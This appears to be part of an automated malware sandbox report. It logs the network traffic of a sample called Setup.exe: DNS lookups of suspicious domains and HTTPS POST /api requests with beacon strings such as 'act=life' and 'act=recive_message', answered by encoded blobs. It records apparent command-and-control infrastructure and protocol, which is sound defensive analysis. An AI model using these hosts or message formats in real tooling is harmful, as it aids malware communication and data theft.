                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.680109978 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.680453062 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.680464983 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.680529118 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.680536032 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.681211948 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.681226969 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.681283951 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.681294918 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.681312084 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.703006029 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.703018904 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.703079939 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.703088045 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.704081059 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.704097986 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.704149008 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.704157114 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.704191923 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.705163956 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.705179930 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.705250978 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.705271959 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.770246029 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.770267963 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.770339012 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.770350933 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.770517111 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.770529985 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.770581961 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.770591021 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.771007061 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.771023989 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.771056890 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.771064043 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.771075964 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.771296978 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.771311045 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.771348953 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.771357059 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.771372080 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.771718025 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.771734953 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.771785021 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.771792889 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.793606043 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.793622017 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.793701887 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.793724060 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.794601917 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.794622898 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.794671059 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.794677973 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.794689894 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.798605919 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.798619986 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.798692942 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.798702002 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.840980053 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.860753059 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.860773087 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.860815048 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.860827923 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.860840082 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.860874891 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.861140966 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.861155987 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.861205101 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.861212015 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.861253023 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.861387968 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.861401081 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.861454010 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.861460924 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.861493111 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.861501932 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.861900091 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.861913919 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.861968040 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.861974001 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.862014055 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.862405062 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.862420082 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.862457991 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.862464905 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.862478018 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.862508059 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.868412971 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.884315968 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.884336948 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.884380102 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.884388924 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.884399891 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.884426117 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.885262966 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.885277033 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.885323048 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.885330915 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.885339975 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.885368109 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.886434078 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.886450052 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.886485100 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.886492968 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.886512041 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.886534929 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.887506962 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951498985 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951514959 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951571941 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951581955 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951608896 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951649904 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951814890 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951828003 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951864958 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951872110 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951899052 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951915026 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952081919 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952095985 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952137947 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952143908 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952152967 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952166080 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952178001 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952183008 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952209949 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952223063 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952253103 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.954262972 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:27.033876896 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:27.033894062 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:27.033941031 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:27.033951998 CET44349745104.21.37.128192.168.2.4

                                                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:07.841656923 CET5532953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:07.854656935 CET53553291.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:18.596878052 CET6182053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:18.651189089 CET53618201.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:19.783797979 CET6298753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:19.793740034 CET53629871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:20.497229099 CET5389753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:20.506439924 CET53538971.1.1.1192.168.2.4

                                                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:07.841656923 CET192.168.2.41.1.1.10xc43cStandard query (0)abberanteusz.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:18.596878052 CET192.168.2.41.1.1.10x798dStandard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:19.783797979 CET192.168.2.41.1.1.10x285bStandard query (0)klipvumisui.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:20.497229099 CET192.168.2.41.1.1.10x1f7cStandard query (0)dfgh.onlineA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:07.854656935 CET1.1.1.1192.168.2.40xc43cNo error (0)abberanteusz.click172.67.198.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:07.854656935 CET1.1.1.1192.168.2.40xc43cNo error (0)abberanteusz.click104.21.74.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:18.651189089 CET1.1.1.1192.168.2.40x798dNo error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:19.793740034 CET1.1.1.1192.168.2.40x285bNo error (0)klipvumisui.shop104.21.37.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:19.793740034 CET1.1.1.1192.168.2.40x285bNo error (0)klipvumisui.shop172.67.208.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:20.506439924 CET1.1.1.1192.168.2.40x1f7cName error (3)dfgh.onlinenonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                                                            • abberanteusz.click
                                                                                                                                                                                                                                                            • cegu.shop
                                                                                                                                                                                                                                                            • klipvumisui.shop

                                                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            0192.168.2.449730172.67.198.1024437316C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-01 18:04:08 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                            Host: abberanteusz.click
                                                                                                                                                                                                                                                            2025-01-01 18:04:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                                            2025-01-01 18:04:08 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:08 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=uf40m1003este2m7g2acai2125; expires=Sun, 27 Apr 2025 11:50:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lAbbj%2BH7iGFJ3LWIi8XLbimZ9yJRTVPhqdrp%2F8iI%2BW8X3WWBTH9tf7J6FNJM6wC3d9W8Y6TBOs7pBYIVcO2SLiBi34K6TwWL1gsbDeUPkrcrgpcaZs2Rck6v3IIy65UpHngO6Zk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fb46e18de5b8c41-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5528&min_rtt=1851&rtt_var=3063&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1577525&cwnd=225&unsent_bytes=0&cid=142fc68dfa298e1f&ts=484&x=0"
                                                                                                                                                                                                                                                            2025-01-01 18:04:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                                            2025-01-01 18:04:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1192.168.2.449731172.67.198.1024437316C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-01 18:04:09 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 77
                                                                                                                                                                                                                                                            Host: abberanteusz.click
                                                                                                                                                                                                                                                            2025-01-01 18:04:09 UTC77OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 47 41 53 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--GAS&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                                                                                                                                                                            2025-01-01 18:04:09 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:09 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=d8rgibco7bj0ugg1chucjgu97h; expires=Sun, 27 Apr 2025 11:50:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xCfFOgbwrdeBfpeioVG9Tg7aaJhGcmRwYbOR7e7T1x%2BgkISRfGUtGdPC%2FTEol2E%2FyObjlem5zNy%2F2yy%2BZG%2B5259DeuTq2pJTrsLDtQ9Xja3ICL9l9UNspYujupakrxKKSFkWiNA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fb46e1eb9614328-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1600&rtt_var=800&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4228&recv_bytes=979&delivery_rate=155236&cwnd=220&unsent_bytes=0&cid=4417f3f8c816dab1&ts=490&x=0"
                                                                                                                                                                                                                                                            2025-01-01 18:04:09 UTC237INData Raw: 63 35 33 0d 0a 58 6e 66 33 4d 5a 44 4a 73 64 41 42 6b 35 32 48 42 65 73 4b 35 30 49 37 33 36 51 63 70 5a 4b 4a 52 4b 4a 53 41 31 33 36 71 49 41 6c 56 59 45 54 71 76 32 64 38 6e 4c 32 76 37 31 6a 69 6d 61 55 4a 78 66 39 78 58 69 48 71 4f 38 6c 7a 69 46 6d 63 64 6a 65 37 58 78 4e 6b 56 44 38 75 74 54 38 49 2f 62 6c 70 54 2b 77 63 63 55 6e 56 66 32 65 50 73 44 34 36 79 58 4f 4d 47 49 32 6c 64 6a 73 50 52 2b 62 56 76 69 73 30 72 52 67 2f 2f 44 69 59 49 35 72 6a 53 78 53 73 73 78 78 68 37 36 72 49 64 68 77 4f 58 2b 33 7a 66 51 2f 4f 70 5a 43 2b 2b 76 4d 2f 48 71 78 2b 4f 6b 6e 30 53 69 47 4a 31 6d 7a 77 6e 6a 4f 2b 75 45 73 78 6a 46 6e 4e 34 72 42 35 6a 59 66 6c 56 58 35 70 74 75 67 62 66 58 33 36 57 61 45
                                                                                                                                                                                                                                                            Data Ascii: c53Xnf3MZDJsdABk52HBesK50I736QcpZKJRKJSA136qIAlVYETqv2d8nL2v71jimaUJxf9xXiHqO8lziFmcdje7XxNkVD8utT8I/blpT+wccUnVf2ePsD46yXOMGI2ldjsPR+bVvis0rRg//DiYI5rjSxSssxxh76rIdhwOX+3zfQ/OpZC++vM/Hqx+Okn0SiGJ1mzwnjO+uEsxjFnN4rB5jYflVX5ptugbfX36WaE
                                                                                                                                                                                                                                                            2025-01-01 18:04:09 UTC1369INData Raw: 61 38 56 75 47 62 72 65 50 70 2b 77 75 42 54 44 49 58 41 71 6c 64 72 6b 66 41 72 62 53 72 4b 73 33 2f 49 37 73 66 66 70 61 59 78 72 69 69 64 59 76 64 52 78 78 2f 50 6a 4c 73 51 36 62 6a 43 58 78 4f 67 37 48 5a 78 55 2f 61 7a 62 74 47 7a 79 76 36 73 6e 6a 6e 44 46 65 42 6d 64 31 6e 33 45 35 4f 59 33 67 43 38 76 4a 74 6a 4e 37 6e 78 4e 31 56 58 38 71 74 36 79 63 66 6e 30 37 6d 4b 62 59 34 77 74 56 4c 33 4c 64 4d 6a 7a 36 79 48 4b 4f 6d 34 31 6e 4d 66 76 4f 68 57 56 45 37 7a 72 31 4b 6f 6a 71 62 2f 47 59 70 6c 76 69 54 59 62 68 34 5a 68 69 65 6d 72 49 63 78 77 4f 58 2b 51 7a 2b 45 2f 48 70 70 51 2b 71 44 42 73 6e 48 33 38 75 42 31 6a 32 32 4c 4b 6c 71 76 7a 48 44 42 38 2b 49 74 79 54 56 6d 4f 39 69 45 6f 6a 73 4e 31 51 75 79 69 74 36 35 62 2f 76 6f 35 53 65
                                                                                                                                                                                                                                                            Data Ascii: a8VuGbrePp+wuBTDIXAqldrkfArbSrKs3/I7sffpaYxriidYvdRxx/PjLsQ6bjCXxOg7HZxU/azbtGzyv6snjnDFeBmd1n3E5OY3gC8vJtjN7nxN1VX8qt6ycfn07mKbY4wtVL3LdMjz6yHKOm41nMfvOhWVE7zr1Kojqb/GYplviTYbh4ZhiemrIcxwOX+Qz+E/HppQ+qDBsnH38uB1j22LKlqvzHDB8+ItyTVmO9iEojsN1Quyit65b/vo5Se
